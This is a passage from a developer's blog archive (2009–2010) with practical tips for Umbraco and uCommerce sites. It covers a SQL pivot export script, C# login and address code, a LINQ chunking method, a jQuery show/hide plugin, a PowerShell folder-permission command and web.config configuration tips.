# Tuesday, November 09, 2010

In a follow-up to yesterday's post -How to download Umbraco content properties into a crosstab table- here is the SQL script that makes it even easier to download any Umbraco document type into Excel.

This SQL script is fairly simple: it gets the properties associated with the specified document type and then pivots the values, so you end up with a table of data that looks like this:

Id    Property 1    Property 2    Property 3    ...    Property n
123   String        Int           Date          ...    xxx

How to use the script

All you need to do is set the parameter "@ContentTypeId" to the id of the document type you want (as in my previous post, you can get this by checking the link on the document type).

Once you've set the id, just run the script and voila, there's your data.

If you run the script and only get "Command(s) completed successfully", you've not set the id correctly, so double-check it and try again.

The Script

DECLARE @cols NVARCHAR(max), @ContentTypeId int
SET @ContentTypeId = 1074

-- Note: use varchar(255) explicitly; CONVERT(varchar, ...) defaults to 30 characters,
-- which can truncate long property names and break the pivot column list
SELECT  @cols = STUFF(( 
	SELECT DISTINCT TOP 100 PERCENT
        '],[' 
        + CONVERT(varchar(255), Name + ' (' + CONVERT(varchar(10), id) + ')')
    FROM
		dbo.cmsPropertyType
	WHERE
		contentTypeId = @ContentTypeId
    ORDER BY
        '],[' 
        + CONVERT(varchar(255), Name + ' (' + CONVERT(varchar(10), id) + ')')
    FOR XML PATH('')
), 1, 2, '') + ']'
--SELECT  @cols

DECLARE @query NVARCHAR(max)
SET @query = N'SELECT Id, ' + @cols + '
FROM
  (
		SELECT
			CONVERT(varchar(255), t.Name + '' ('' + CONVERT(varchar(10), t.id) + '')'') As [PropId],
			contentNodeId As [Id],
			ISNULL(dataNvarchar, ISNULL(CONVERT(varchar, dataDate), ISNULL(CONVERT(varchar, dataInt), dataNtext))) As [Value]
		FROM
			dbo.cmsPropertyType t LEFT JOIN dbo.cmsPropertyData d ON t.id = d.propertytypeid
		WHERE
			contentTypeId = ' + CONVERT(varchar, @ContentTypeId) + ' 
) p
PIVOT
(
	MAX(Value) 
	FOR PropId IN ( '+ @cols +' )
) AS pvt
ORDER BY Id ASC'

--PRINT(@query)
EXECUTE(@query)
Tuesday, November 09, 2010 9:16:24 PM (GMT Standard Time, UTC+00:00)
# Tuesday, October 26, 2010

Probably one of the most common features of an ecommerce system is "retrieve my details" when logging in -after all, that's why you create an account with the seller, isn't it?

Out of the box, uCommerce has XSLT to retrieve the customer's last x addresses, but one thing it doesn't do is automatically re-assign the customer's details when they log in using the built-in Umbraco membership code, so we need to work around that ourselves -don't worry, it's not too hard (all the code is below for you).

Background

All customer addresses are stored in the uCommerce_Address table automatically. There should be one unique address per customer; however, if you're on an earlier release you may find you have several copies of the same address for each customer -this is a bug that was fixed in v1.0.5.0, so upgrade if you can.

Now you'd be forgiven for thinking that you can just select the address from the uCommerce_Address table and then assign its id to the BillingAddressId property of your purchase order. However, if you do that, you'll find you get the error:

The UPDATE statement conflicted with the FOREIGN KEY constraint "FK_uCommerce_PurchaseOrder_uCommerce_OrderAddress". 
The conflict occurred in database "CommsReadyCMS", table "dbo.uCommerce_OrderAddress", column 'OrderAddressId'.
The statement has been terminated.

 

You get this because there is a second table involved: uCommerce_OrderAddress. It stores the actual address used throughout the order process, so that if the customer changes an address in the future, the order will still have the correct address.

The Solution

As mentioned, working around this isn't actually too difficult. The easiest solution is to create a new User Control in Visual Studio (I'll call mine Login.ascx) and hook into the LoggedIn event. Once logged in, get the Umbraco member and, from that, the customer's billing address.

There's one caveat I found with uCommerce, and that's the way it gets the address. At the moment there is a GetAddress function on Customer. This is great; however, if you check out the code it calls, it actually gets the customer's first address from the database rather than the last address used. I don't think this is a bug, as in most cases the first address you enter is your main address. I'll blog separately about managing a default address within the members section.

The code below, however, retrieves the most recently added address from the database.

Login.ascx

<asp:literal runat="server" ID="litLoggedIn" />
<asp:literal runat="server" ID="litLoggedOut" />
<asp:Login runat="server" id="lgnForm" CssClass="checkout-details" 
	DisplayRememberMe="false" TitleText="" OnLoggedIn="lgnForm_LoggedIn"
	UserNameLabelText="Email Address" />

 

Login.ascx.cs

protected void lgnForm_LoggedIn(object sender, EventArgs e)
{
    //If the user has a basket, wire up the billing address from their last order details
    var basket = SiteContext.Current.OrderContext.GetBasket(true);
    if (basket != null)
    {
        //Get the customer's current order
        var po = basket.PurchaseOrder;
        //Look for an existing billing address
        var add = po.GetBillingAddress();
        //We only need to assign the address if there isn't already one assigned to this order
        if (add == null)
        {
            //Get the customer who's just logged in
            var mem = Membership.GetUser(lgnForm.UserName);
            //To be safe check that we have a member
            if (mem != null)
            {
                //Find the customer
                var customer = Customer.ForUmbracoMember(Convert.ToInt32(mem.ProviderUserKey));
                if (customer != null)
                {
                    //Get the customer's most recent address
                    var previousAddress = customer.Addresses.ToList().LastOrDefault(a => a.AddressName == "Billing");
                    //If you want to get the customer's first address just uncomment this line
                    //var previousAddress = customer.GetAddress("Billing");

                    //Populate a new order address from the previous address
                    if (previousAddress != null)
                    {
                        OrderAddress address = new OrderAddress
                                {
                                    FirstName = previousAddress.FirstName,
                                    LastName = previousAddress.LastName,
                                    EmailAddress = previousAddress.EmailAddress,
                                    PhoneNumber = previousAddress.PhoneNumber,
                                    MobilePhoneNumber = previousAddress.MobilePhoneNumber,
                                    CompanyName = previousAddress.CompanyName,
                                    Line1 = previousAddress.Line1,
                                    Line2 = previousAddress.Line2,
                                    PostalCode = previousAddress.PostalCode,
                                    City = previousAddress.City,
                                    State = previousAddress.State,
                                    Attention = previousAddress.Attention,
                                    CountryId = previousAddress.CountryId,
                                    AddressName = "Billing",
                                    OrderId = new int?(po.OrderId)
                                };
                        //Store the address in the database
                        address.Save();
                        //Assign the address to the purchase order
                        po.BillingAddressId = new int?(address.OrderAddressId);
                        //Save the purchase order (shopping cart)
                        po.Save();
                    }
                }
            }
        }
    }
}
Tuesday, October 26, 2010 11:31:55 AM (GMT Daylight Time, UTC+01:00)
# Wednesday, August 18, 2010

We’ve all done it: you run into a problem while developing, bash at it for a few hours, and before you know it you’ve lost the day, got nowhere and feel completely frustrated. What’s more, it’s usually something so screamingly obvious and/or simple that you just know you’ll find the answer on Google.

Rather than pulling your hair out for hours on end, there’s a rather simple rule-of-thumb that you should follow:

If you’re able to bash at it for 30 minutes without feeling you’re getting any closer, you’re probably looking at it from the wrong direction and having someone else’s perspective on the problem will probably answer it within seconds. By walking away from the problem you’re also taking away the pressure and you’ll often find the solution comes to you.

Another advantage of putting a time limit on the issue is that it stops you losing the whole day. It should also mean you’ve explored Google and the mailing lists, so when you ask your “friend” for help you avoid that annoying lmgtfy response (it’s a similar concept to the “wait 1 minute before sending” facility in Outlook).

So the next time you realise something’s taking longer than you think it should, start the timer!

Wednesday, August 18, 2010 4:50:07 PM (GMT Daylight Time, UTC+01:00)
# Tuesday, August 17, 2010

I thought, seeing as uCommerce is now an actual product, I would start to overview an install/configuration of uCommerce assuming no prior knowledge. Firstly, let me start off by saying that once you've got your head around uCommerce and some of its complexities, you'll find it a fantastic product that makes creating a new ecommerce website as easy as setting up a standard Umbraco website. It is still missing a few features, but you can easily work around these with a bit of custom XSLT/C#.

Ok, back to setting up your first uCommerce website. I've grouped these into what I feel are logical sections but if I've missed something, please let me know.

1. Install the uCommerce Package

If you've not already done so, go to the uCommerce Download page and download the uCommerce package (at time of writing, I'm using 1.0.4.2) and then download the uCommerce Store package (currently 1.0.1.2).

Install the uCommerce package as you do any other package in Umbraco. Once installed you'll be able to install the store package.

Assuming all your permissions on your Umbraco install are correct, refresh your browser and you should have a new section "Commerce". If they're not right, you'll be told to add a few web.config settings.

2. Wire up the catalog

This is the step that I didn’t “do” when we first got started and it turns out it’s one of the most important steps as it joins the uCommerce catalog to the front end.

  1. Go to your Umbraco "Content" section
  2. Right click on the page you would like to be the store's "home" page (in the example store, this would be "Shop")
  3. Click "Manage hostnames" (see figure below)
    Manage Hostnames Context Menu
  4. Enter your hostname (the domain name the site runs on) in the "Domain" box and then choose the default language for the website
    Manage Hostnames screen
  5. Click "Add new Domain" and then "Close this window"
  6. Click the "Commerce" section button (in the bottom left)
  7. Click the little arrow to the left of "Product Catalog"
  8. Left click the relevant catalog (if you've installed the store package this will be "uCommerce")
  9. Select your new domain from the "Host name" drop down list
    Manage Hostnames screen
  10. Click the save disk button in the top left

3. Setup Your Product Definitions

A “Product Definition” is uCommerce’s equivalent of a document type; it allows you to add additional information to a product. If you’re using the uCommerce starter store, you’ll get a couple of product definitions out of the box –software and support. At the moment you can't add additional properties through the uCommerce back end (i.e. if you wanted to add extra information such as Meta Keywords/Descriptions etc. -I'll cover how we got around this in a later post), but there are a number of default category/product properties (I've put their XML reference in brackets where relevant):

uCommerce Category Properties

  • Image (@image)
  • Display Name (@displayName)
  • Description (@description)

The default XML looks like this:

<category parentCategoryId="" parentCategoryName="" index="0" id="67" name="Software" displayName="Software" displayOnSite="True" description="" image="" />

uCommerce Product Properties

  • SKU (@sku)
  • Internal name
  • Display on web site (@displayOnSite)
  • Allow ordering (@allowOrdering)
  • Thumbnail (@thumbnailImage)
  • Primary image (@primaryImage)
  • Display name (@displayName)
  • Short description (@shortDescription)
  • Long description (@longDescription)

The default XML looks like this (the variants are not standard but are there because they're set up as part of the store package):

<product index="0" sku="100-000-001" displayName="uCommerce 1.0 RTM" shortDescription="uCommerce is a full featured e-commerce platform with content management features powered by Umbraco. Everything you need to build a killer e-commerce solution for your clients!" longDescription="uCommerce is fully integrated with the content management system Umbraco, which provides not only the frontend renderendering enabling you to create beautifully designed stores, but also the back office capabilities where you configure and cuztomize the store to your liking.&#xD;&#xA;&#xD;&#xA;uCommerce_ foundations provide the basis for an e-commerce solution. Each foundation addresses a specific need for providing a full e-commerce solution to your clients. foundations in the box include a Catalog Foundation, a Transactions Foundation, and an Analytics Foundation.&#xD;&#xA;&#xD;&#xA;Each of the foundations within uCommerce_ are fully configurable right in Umbraco. No need to switch between a multitude of tools to manage your stores. It's all available as you would expect in one convenient location." thumbnailImage="1097" primaryImage="1097" allowOrdering="True" isVariant="False" displayOnSite="True" hasVariants="True" price="3495.0000" currency="EUR">
  <variants>
    <product index="0" sku="100-000-001" displayName="Developer Edition" shortDescription="" longDescription="" thumbnailImage="0" primaryImage="0" allowOrdering="False" isVariant="True" displayOnSite="False" hasVariants="False" variantSku="001" price="0.0000" currency="EUR" Downloadable="on" License="Dev" />
    <product index="1" sku="100-000-001" displayName="30 Days Evaluation" shortDescription="" longDescription="" thumbnailImage="0" primaryImage="0" allowOrdering="False" isVariant="True" displayOnSite="False" hasVariants="False" variantSku="002" price="3495.0000" currency="EUR" Downloadable="on" License="Eval" />
    <product index="2" sku="100-000-001" displayName="Go-Live" shortDescription="" longDescription="" thumbnailImage="0" primaryImage="0" allowOrdering="False" isVariant="True" displayOnSite="False" hasVariants="False" variantSku="003" price="3495.0000" currency="EUR" Downloadable="on" License="Live" />
  </variants>
</product>

Adding additional product properties is simple.

  1. Click the "Commerce" section button
  2. Navigate to: Settings --> Catalog --> Product Definitions
  3. Choose the product definition you would like to edit (or create a new one in the same way that you would with Umbraco document types)
  4. Right click the product definition you need to add extra properties to and click "Create"
  5. Type in a name for your new property, e.g. "Size"
  6. Choose the Data Type for the property (if you need something that's not listed see "Creating your own Data Type" below):
    • ShortText -A textbox
    • LongText -A text area
    • Number -Believe it or not, a numeric value
    • Boolean -A checkbox
    • Image -A media selector
  7. Click the "Create" button
  8. You can now choose a few additional options for the new property including how it should be shown to the user and whether it's Multilingual.
    • Name -the text used as the label in the uCommerce product editor (it's also the name of the XML attribute that will contain its value)
    • Data Type -the type of control to render in the uCommerce product editor
    • Multilingual -whether the control should be shown on the "Common" tab of the uCommerce product editor or the language specific tab
    • Display On Web Site -A flag that's sent out in the XML so you can decide whether or not to show it on the website
    • Variant Property -Whether this should appear as a table column heading under the "Variants" tab (I'll go into variants more in a later post)
      Note: Do not set both Multilingual and Variant Property to true as, at the moment, the property won't be shown in the uCommerce product editor -you've been warned!
    • Render in Editor -Whether the control should be shown in the uCommerce product editor screen or hidden from the administrator (i.e. for data you only want to use internally and don't want edited manually)
  9. Finally, you'll need to enter a Display Name for the various languages. This is what's shown to the user if you dynamically pull through the various properties on the product details page.

4. Creating Your Own Data Type

Now, you may be thinking that that set of data types is a little limiting for something like "Size" or "Colour" and you might want to display something a little more flexible to the user, such as a drop down list. This is easy enough:

  1. Right click the "Data Types" node
  2. Enter a name, e.g. "Size"
  3. Choose the definition for the Data Type (for size we will use "Enum")
  4. Save and refresh the "Data Types" node
  5. Right click your new Data Type and click Create
  6. Enter your option's value, e.g. "Small"
  7. Repeat steps 5-6 until all your options are set, e.g. add "Medium" and "Large"

Note: At the moment the enum values cannot be re-ordered through the UI, so make sure you add them in the order you want them to appear in the editor!

5. Load Your Catalog

Once you've finished creating your various product types, it's time to create your catalog. Creating categories and products within uCommerce is as simple as creating pages in Umbraco. Using the same right click menu concept you can create nested categories as deep as your catalog requires. You can add products and categories at any level by choosing either the "Category" or "Product" radio button and choosing your product type.

6. You're Done!

Assuming you've followed the steps above, you should now have a (fairly basic) store set up. Go to your site's homepage, click the "uCommerce" menu item and voila, your categories and products should be listed.

Not getting the categories you were expecting? Use the helpful XSLT “copy-of” trick within either the "RootCategories[XSLT].xslt" file or the "Category[XSLT].xslt" file:

<pre><xsl:copy-of select="$categories" /></pre>

and then have a look at the output:

<errors><error>No product catalog group found supporting the current URL.</error></errors>

If you're getting the above error, currently (and this may be a misunderstanding or change later) you have to have the catalog and catalog group names the same –in the example site, they’re both “uCommerce”.

As I don't think the concept store with Software/Support is particularly real-world, I'm going to work on creating a basic store that you can use to better understand uCommerce and its intricacies.

Check back soon as I'll be posting an overview of the checkout process, the various XSLT files and integrating payment gateways into uCommerce (initially SagePay, PayPoint, WorldPay and PayPal).

Tuesday, August 17, 2010 5:49:45 PM (GMT Daylight Time, UTC+01:00)
# Thursday, August 12, 2010

Ever needed to take a large list and split it into smaller subsets of data for processing? Well, this is the extension method for you. Tonight we had to split a small dataset (500 items) into even smaller sets of 10 so the provider’s web service wouldn’t time out.

Seeing as I was going to miss out on my evening, I thought I’d see if I could do it a little differently using Linq and this is what I came up with:

/// <summary>
/// Simple method to chunk a source IEnumerable into smaller (more manageable) lists
/// </summary>
/// <param name="source">The large IEnumerable to split</param>
/// <param name="chunkSize">The maximum number of items each subset should contain</param>
/// <returns>An IEnumerable of the original source IEnumerable in bite size chunks</returns>
public static IEnumerable<IEnumerable<TSource>> ChunkData<TSource>(this IEnumerable<TSource> source, int chunkSize)
{
    for (int i = 0; i < source.Count(); i += chunkSize)
        yield return source.Skip(i).Take(chunkSize);
} 

It should extend any IEnumerable and allow you to split it into smaller chunks which you can then process to your heart’s content.
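One thing worth knowing: because the method calls Count() and Skip(i), it re-enumerates the source once per chunk, which is fine for an in-memory List but can be expensive for a lazily-evaluated source. As a sketch (my own variant, not from the original post -the name ChunkDataOnce is made up), a single-pass version could look like this:

```csharp
using System;
using System.Collections.Generic;

public static class EnumerableExtensions
{
    /// <summary>
    /// Single-pass alternative to ChunkData: walks the source exactly once,
    /// buffering items into lists of up to chunkSize.
    /// </summary>
    public static IEnumerable<List<TSource>> ChunkDataOnce<TSource>(
        this IEnumerable<TSource> source, int chunkSize)
    {
        if (chunkSize <= 0) throw new ArgumentOutOfRangeException("chunkSize");

        var chunk = new List<TSource>(chunkSize);
        foreach (var item in source)
        {
            chunk.Add(item);
            if (chunk.Count == chunkSize)
            {
                //Chunk is full -hand it back and start a new one
                yield return chunk;
                chunk = new List<TSource>(chunkSize);
            }
        }
        //Don't forget the final, possibly partial, chunk
        if (chunk.Count > 0)
            yield return chunk;
    }
}
```

The trade-off is that each chunk is materialised as a List rather than staying deferred, but you only ever pay for one pass over the source.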

Here’s a quick example of it in use:

var list = new List<string>() { "Item 1", "Item 2", "Item 3", "Item 4", "Item 5", "Item 6", "Item 7", "Item 8", "Item 9", "Item 10" };
Console.WriteLine("Original list is {0} items", list.Count);
var chunked = list.ChunkData(3);
Console.WriteLine("Returned the data in {0} subsets", chunked.Count());
int i = 1;
foreach (var subset in chunked)
{
    Console.WriteLine("{0} items are in subset #{1}", subset.Count(), i++);
    int si = 1;
    foreach (var s in subset)
        Console.WriteLine("\t\tItem #{0}: {1}", si++, s);
}

And this will output

Original list is 10 items
Returned the data in 4 subsets
3 items are in subset #1
		Item #1: Item 1
		Item #2: Item 2
		Item #3: Item 3
3 items are in subset #2
		Item #1: Item 4
		Item #2: Item 5
		Item #3: Item 6
3 items are in subset #3
		Item #1: Item 7
		Item #2: Item 8
		Item #3: Item 9
1 items are in subset #4
		Item #1: Item 10

Two lines of code to do all that work -neat!

Thursday, August 12, 2010 9:32:44 AM (GMT Daylight Time, UTC+01:00)
# Monday, July 12, 2010

There are plenty of tutorials around that show you how to show or hide a div with jQuery (you can find a load on Google), but I wanted something that was re-usable throughout our projects, so I created the addShowHideLink jQuery plugin.

We’ve been using it across a few projects, including Crisis Cover, for a while now and it’s catered for all our needs. Let me know if there are any other options you want added.

I’ve not published any of our plug-ins before, so forgive me if there are some obvious errors, but I figured someone else would find it useful.

What does it do?

Simple: it hides the specified object and adds a link that shows the object when clicked. It also swaps the show text for the specified hide text automatically.

How do I use it?

I’ve kept it as simple as possible but have hopefully given it enough functionality to suit your needs.

Basic Usage

$('#objectToHide').addShowHideLink();

Used with options

$('#objectToHide').addShowHideLink({ 
		linkClass: 'showHideLnk',
		paraClass: 'showHide',
		openClass: 'showHideOpen',
		showText: 'Show Advanced Options',
		hideText: 'Hide Advanced Options',
		linkActions: function(){
			alert('The link was clicked');
		}
	});

 

How do I get it?

I’ve uploaded a more complete example to: http://blogs.thesitedoctor.co.uk/tim/Plugins/addShowHideLink/ so you can get a quick idea of what it does.

You can download the plug-in here.

Thanks to Trevor Morris for his jQuery skeleton starter framework.

Monday, July 12, 2010 8:09:58 PM (GMT Daylight Time, UTC+01:00)
# Thursday, June 17, 2010

If you're not configuring Umbraco through a web installer, if your installs have been in place for years and the permissions were never checked, or if whoever set the permissions up was lazy and gave IIS write access to the entire folder, there will come a time when you want to restrict modify access to just those user(s) who should have it.

You can find a (pretty) complete list of the files/folders that the Umbraco install should have access to here, but assigning them across 101 different installs is a PITA. Thanks to a helpful PowerShell script to set folder permissions from PowerShell.nu, you can easily automate the process.

For those of you not familiar with PowerShell (like me) complete instructions are below. For the rest, here's the command:

Get-ChildItem -path ##PATH TO YOUR INSTALL## |
Where { $_.name -eq "Bin" -or $_.name -eq "Config" -or $_.name -eq "Css" -or $_.name -eq "Data" -or $_.name -eq "Masterpages" -or $_.name -eq "Media" -or $_.name -eq "Scripts" -or $_.name -eq "Umbraco" -or $_.name -eq "Umbraco_client" -or $_.name -eq "UserControls" -or $_.name -eq "Xslt" } |
ForEach {./SetFolderPermission.ps1 -path $_.Fullname -Access "NETWORK SERVICE" -Permission Modify}

 

Instructions:

  1. Save the SetFolderPermission.ps1 script to your server
  2. Open your PowerShell console (I think it's installed by default; if not, you can download PowerShell here)
  3. Copy the above PowerShell command into notepad
  4. Update "##PATH TO YOUR INSTALL##" to your Umbraco install
  5. If your IIS install doesn't use NETWORK SERVICE as the default user, update it to your user
  6. Make sure it's all on a single line
  7. Copy/Paste/Run in PowerShell

Bonus

If you're uber lazy and just have a web folder full of Umbraco installs, you can set the path to that folder and use:

Get-ChildItem -path ##PATH TO YOUR FOLDER## -recurse |
Where { $_.name -eq "Bin" -or $_.name -eq "Config" -or $_.name -eq "Css" -or $_.name -eq "Data" -or $_.name -eq "Masterpages" -or $_.name -eq "Media" -or $_.name -eq "Scripts" -or $_.name -eq "Umbraco" -or $_.name -eq "Umbraco_client" -or $_.name -eq "UserControls" -or $_.name -eq "Xslt" } |
ForEach {./SetFolderPermission.ps1 -path $_.Fullname -Access "NETWORK SERVICE" -Permission Modify}

 

I've not tried this mind you and can't recommend it but hey, it's there if you want it ;)

Thursday, June 17, 2010 2:47:22 PM (GMT Daylight Time, UTC+01:00)
# Wednesday, April 21, 2010

This is a great little tip that Andy Higgs shared with me a couple of months ago while we were developing Crisis Cover. If you write jQuery that hides a div when the user has JavaScript enabled, you can avoid the divs all being shown while the page loads by adding a class to the body of the page using jQuery and hiding them with CSS, like so:

<html>
<head></head>
<!-- Reference to jQuery here -->
<body>
<!-- This should be the first bit of code and don't wait until the page has loaded -->
<script type="text/javascript">$('body').addClass('js');</script>
<!-- The rest of your code here -->
<div class="jsHide">
	<p>This paragraph is hidden if the user has JavaScript enabled.</p>
</div>
</body>
</html>

 

Then you just need to add the css:

.js .jsHide { display: none; }

Your divs will now be hidden until you show them with JavaScript. Nice, simple solution to an ever annoying problem.

Note: For my demo to work you'll need to include jQuery

Update: As pointed out by Petr below and Andy Higgs/Trevor Morris, it would be better to add the class using plain JavaScript (no jQuery dependency) and to target the html element for maximum flexibility (note the leading space in case there is already a class):

<script type="text/javascript">document.getElementsByTagName('html')[0].className+=' js'</script>
Wednesday, April 21, 2010 10:30:25 PM (GMT Daylight Time, UTC+01:00)
# Sunday, April 18, 2010

You may have come across this error once or twice while deploying your project if you develop using Web Deployment Projects. It's usually caused by copying and pasting a page and forgetting to update both the page declaration and the code-behind file.

But the website builds!?!

You don't usually get the ILMerge error until you build the web deployment project because when you build a website directly, it doesn't compile all the code into a single assembly, so the class names are seen as different. Part of the web deployment process is to compile all the website's code into a single assembly, hence the duplicate references.

What's the solution?

It's surprisingly simple, all you need to do is open up the offending aspx and aspx.cs files and update two lines:

1. In the code-behind file, rename the partial class. By default Visual Studio will name the class FolderName_PageName, which should result in a unique name.

2. In the aspx file, update the page declaration (the first line of the page). You have to make sure that both the Inherits attribute and the CodeBehind reference are correct.

Tip: To avoid confusing yourself, open the files independently using Solution Explorer: if you open the aspx and press F7 to switch to the code-behind file before updating the page declaration, you'll end up editing the page you copied rather than the copy.
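To make the two steps concrete, here's a sketch (the folder, page and class names are entirely hypothetical): if you'd copied a page into Admin/EditUser.aspx, the renamed code-behind would look like this, with the matching @ Page directive shown in the comment.

```csharp
// Admin/EditUser.aspx.cs (hypothetical file)
// The partial class name must be unique across the compiled site assembly and
// must match the Inherits attribute of the @ Page directive in the aspx file:
// <%@ Page Language="C#" CodeBehind="EditUser.aspx.cs" Inherits="Admin_EditUser" %>
public partial class Admin_EditUser : System.Web.UI.Page
{
}
```

Once both the class name and the directive agree (and no other page uses the same name), the web deployment project's single-assembly compile stops seeing duplicates.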

Sunday, April 18, 2010 12:47:20 PM (GMT Daylight Time, UTC+01:00)
# Monday, July 27, 2009

It's taken some time to get here, and there's still more to add as I think this is a pretty big topic, but I thought I'd get started. I wanted to keep the session focused more on the selling points of Umbraco and how people pitch it to clients than on selling techniques, which on the whole we managed to do.

The first thing I stressed was that I wasn't going to teach selling techniques, as I've never found that hard selling works -though I'm not saying it doesn't; I just prefer to educate the client into the most suitable solution (even if that isn't us).

There were a number of questions raised and I'll answer what I can here; if you were at the session and I've missed something, please let me know and I'll get it added:

  1. What are the key selling points of Umbraco?
  2. How do you pitch Umbraco?
  3. Do you tell clients it's open source (or use that as a sales point)?
  4. How do you price Umbraco?
  5. Once you've won, what do you ask your client?
  6. How do you support Umbraco?
  7. How do you get around the question of "What happens if you get hit by a bus?"

What are the key selling points of Umbraco?

A couple of the attendees came up with better 30-second sales pitches, so I'm sure they'll post those up shortly, but here are a few I remember:

  • It's easy to use -you don't need any previous computer experience
  • You can edit any page's content yourself at any time
  • It's highly flexible and lightweight
  • It's search engine friendly
  • It's open source (this really can be a selling point at the right time)

Do you tell clients it's open source (or use that as a sales point)?

We do and we don't. Again, it really comes down to who you're pitching Umbraco to. Where the client has had issues with developers not releasing source etc., it's clearly a selling point.

Generally, we do tend to explain to clients that we will base their website on an open source project that we then build on and customise further to suit their needs, and that by using best-practice methodologies, any developer can in theory pick up the system and continue to develop it (even if they have no experience of Umbraco).

How do you price Umbraco?

This question was asked in a couple of different ways throughout the session and it's a topic in itself (see the article I wrote a while ago about pricing your work).

If you look at Umbraco in the right way you'll see that it's actually rather easy to price as there are a few components that you can sell either individually or together:

  • Installation and configuration
  • Customisation
  • Hosting
  • Support

All you need to do is work out a minimum cost for each component and then that will give you a core system cost.

Once you have your core Umbraco costs (don't forget to factor in your license costs) you can then alter the costs accordingly for your client -and this has to be on a case-by-case basis. 

How do you pitch Umbraco

This is easy: Umbraco has so many selling points that, as long as the project is CMS based, there will be some benefit you can present to the client regardless of what they're looking for.

When pitching Umbraco, we have found it pays to educate the client about the benefits and about what they should be looking for in other systems. If you do this, then the majority of the time the rest of the competition falls by the wayside.

If the client is a large corporate it's always worth mentioning that it offers much of the functionality that SharePoint does but with little of the cost (or setup pain!).

Once you've won the contract, what do you ask your client

The first thing to do is to get all the information you need to complete your contract (or at least tell your client what you'll need and when). You should know what you'll need already but we tend to ask for:

  • Design inspiration (websites the client does and doesn't like -and why)
  • Logos and other source imagery
  • Text for the website (you'd be best to load the initial content during training but get the client to think about it while you're developing or you'll never get there!)

Next, you'll need to make sure your paperwork is in order. Once you have agreed the general premise of your contract, it's important that you confirm all deliverables (what you'll be doing for the client) in a work order with the client. This avoids any ambiguity about what you'll be delivering and when. This doesn't need to be pages of text (though sometimes it needs to be) but it avoids disagreements later.

At a minimum, you should always request a signed work order and a deposit (we request at least 20% regardless of project spend) before starting any work.

Once you have the signed work order (you sign one for the client to keep and keep one yourself), you can start thinking about the project. If it'll take longer than a week to deliver, I recommend you provide the client with rough timescales; this will have the added benefit of helping you focus your mind.

How do you support Umbraco

This is something that Paul Sterling addressed through another session and if he doesn't write up his notes I'll make a few notes in another post.

How do you get around the question of "What happens if you get hit by a bus?"

Although this was asked a couple of times throughout the session, I avoided answering it a little due to a conflict of interest. For the past few months we've been working hard on a new system called Crisis Cover which has been designed to help you with this exact question.

Crisis Cover monitors you to ensure that you're still around and, if you don't respond to a number of alerts, it will contact your clients to let them know something is wrong.

I'll post more information about Crisis Cover, but if you're interested in getting involved with the beta, leave me your email and I'll get one sent out.

In Closing

There is a lot of information about selling and business in general in my previous post "Business start-up advice" which, if you're starting out, I really recommend reading as it should give you a really good start (and includes example Service Level Agreements, Contracts and other useful documents).

Monday, July 27, 2009 10:53:28 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Saturday, June 27, 2009

I've started using Rick Strahl's wwAppConfiguration to allow easier access to application constants and one thing that's been bugging me is that it doesn't play nice with configSource -which we update with web deployment projects to specify Development/Staging/Live settings.

The issue is that when you set configSource on the appSettings node, wwAppConfiguration doesn't correctly set the file's path and instead (when using the default settings) writes the new values within the <appSettings> node. The problem then is that ASP.Net complains that you cannot specify both configSource and settings inside the <appSettings> node.

After a little digging, it turns out that you can use "file" in place of "configSource" for the appSettings node (and sadly only the appSettings node) and it allows you to define values within the <appsettings> node and then override them with your external file. This is fantastic because you can store your "default" values in the web.config and then override some or all of them for your various environments.
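
As a minimal sketch of the pattern (filenames and keys here are illustrative, not from the original post), the defaults live inline in web.config and the external file overrides some or all of them:

```xml
<!-- web.config: unlike configSource, the "file" attribute allows inline defaults -->
<appSettings file="config\STAGING-appSettings.config">
  <!-- default value, used when the external file doesn't override it -->
  <add key="SmtpHost" value="localhost" />
</appSettings>

<!-- config\STAGING-appSettings.config: keys here add to and override the inline defaults -->
<appSettings>
  <add key="SmtpHost" value="smtp.staging.example.com" />
</appSettings>
```

Note that if the external file is missing, ASP.Net simply uses the inline defaults rather than throwing an error, which is another difference from configSource.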

The next issue you may run into is if you use web deployment projects, in which case you may get the following error:

web.config(2): error WDP00001: section appSettings in "web.config" has 7 elements but "config\STAGING-appSettings.config" has 19 elements.

To work around this, you just need to untick the "Enforce matching section replacements" checkbox within the properties section and you're good to go!

I hope that helps someone!

Saturday, June 27, 2009 8:19:19 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Tuesday, April 28, 2009

The Error

For those of you who have tried to rename your Umbraco installation directory to something other than the default /umbraco/ you'll have found that TreeInit.aspx throws a JavaScript error along the lines of:

Message: Object expected
Line: 1
Char: 4236
Code: 0
URI: http://www.yourdomain.co.uk/youradmindirector/js/xloadtree.js

As this only really affects the refresh of the tree/close of a couple of dialogues I've not bothered fixing it but basically the issue is outlined well here: http://tinyurl.com/cx9atv

The Fix

If you're already using extensionless URLs then it's easy as pie to sort:

  1. Open your UrlRewriting config file (/config/UrlRewriting.config)
  2. Add this above "</rewrites>":
<add name="missingjs" 
    virtualUrl="^~/## YOUR ADMIN DIRECTORY GOES HERE ##_client/ui/(.*).js" 
    rewriteUrlParameter="ExcludeFromClientQueryString" 
    destinationUrl="~/umbraco_client/ui/$1.js" 
    ignoreCase="true" />

If you're not already using extensionless URLs, don't panic: that's easy to set up and you can read all about it here. Alternatively you could just copy the js files from one folder to another ;)

The Why

I don't know how many people rename their admin directory to something other than the default, but as Umbraco becomes a more popular choice of CMS you really should consider hiding the folder (the more popular it becomes, the more familiar people will be with the default admin directory of /umbraco/).

Although there hasn't yet been a breach (AFAIAA) if a vulnerability is found, the first step in prevention is obfuscation -hide your admin directory! A quick Google search will show you how easy some developers have made it for you to find their admin sites.
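
For reference, the rename itself is usually just an appSettings change; this is a sketch only, and the exact keys and defaults may differ between Umbraco versions, so check your own web.config before relying on them:

```xml
<appSettings>
  <!-- point Umbraco at the renamed admin directory -->
  <add key="umbracoPath" value="~/youradmindirectory" />
  <!-- keep the renamed path (and the installer) out of the normal page pipeline -->
  <add key="umbracoReservedPaths" value="~/youradmindirectory,~/install/" />
</appSettings>
```

You'd then rename the physical /umbraco/ folder on disk to match the new value.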

Tuesday, April 28, 2009 6:49:48 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [3]  | 
# Monday, March 02, 2009

A little irritation/time consuming process when you're working with multiple projects on multiple drives/SVN repos/directories is to open the current file's location within Windows Explorer. If you weren't already aware, you can do this from most projects/files by right clicking on the project in the solution browser:

